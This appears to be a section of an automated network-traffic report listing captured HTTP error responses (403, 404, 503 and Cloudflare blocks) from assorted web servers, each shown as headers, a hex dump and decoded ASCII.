                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 22 Mar 2023 04:45:15 GMTConnection: closeContent-Length: 326Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:45:05 GMTContent-Type: text/htmlContent-Length: 0Connection: keep-aliveX-Powered-By: PleskLin
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:05 GMTServer: ApacheLast-Modified: Fri, 10 Jun 2022 17:11:43 GMTETag: "2c8-5e11b08540544"Accept-Ranges: bytesContent-Length: 712Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 69 2d 4d 53 43 50 20 69 6e 74 65 72 6e 65 74 20 2d 20 4d 75 6c 74 69 20 53 65 72 76 65 72 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 20 2d 20 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 2d 4d 53 43 50 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6e 64 65 78 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 28 49 45 20 37 29 7c 28 49 45 20 38 29 5d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 69 65 37 38 6f 76 65 72 72 69 64 65 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6f 75 74 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 33 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 62 61 63 6b 6c 69 6e 6b 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 32 29 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 42 61 63 6b 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <title>i-MSCP internet - Multi Server Control Panel - Error 403</title> <meta charset="utf-8"> <meta name="application-name" content="i-MSCP"> <meta name='robots' content='nofollow, noindex'> <link rel="icon" href="/errors/inc/favicon.ico"> <link rel="stylesheet" href="/errors/inc/errordocs.css"> <!--[if (IE 7)|(IE 8)]> <link rel="stylesheet" href="/errors/inc/ie78overrides.css"> <![endif]--></head><body><div id="outer"> <div id="inner"> <h1>Error 403</h1> <p>For
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hiEqlFerk6%2BMKcDyQhB%2BvuJ%2F%2Fh%2BwtYx%2BlIYdMEfbaIoDQ%2FivqMiMDGgyopdA%2FS%2F2OHTXWZ2tmuyGiSRH5z9kHlpOs3gNoHj0oq9vLunpy4hXwXsk4Fr%2FyApMxA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc88348503a7f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 63 38 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 Data Ascii: 1c88<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:06 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 22 Mar 2023 04:45:06 GMTContent-Type: text/html; charset=utf-8Content-Length: 148Connection: keep-aliveX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffX-Kong-Upstream-Latency: 2X-Kong-Proxy-Latency: 1Via: kong/1.4.1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 4f 53 54 20 2f 70 61 72 6b 69 6e 67 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot POST /parking/</pre></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:06 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMd8Vr9mc62aLGQToPV1lNMm,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=X-Wix-Request-Id: 1679460306.96217254081716071X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:07 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=25RKa73X3VBXNFOJiypZCV9AqteSMfZ4Wv1kvN%2B5ieoIlnXFT5%2BGB7dp97JsmdH%2BbdyfUZhqN%2FGUlAQnz9tpRtDkILG9wFWLa3n%2Fyav%2FebbcpLwClxCEuehFL5iy0ElC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc886bb3a696f-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:07 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qxVpD7G%2FZSrFfc3vxqnhED4ON5fMPNeGm5rC5TlWH%2F2j%2B5JnkLd%2B50zQwXOJ209Oqcw5QTBoufsvM8oeFawKGC4mMDzvQuJRhxW%2BXlKi146r6RPHrryN1X1e3gWbLIMT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc8870b75696f-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 22 Mar 2023 04:45:07 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:45:06 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:45:07 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:07 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:07 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:07 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
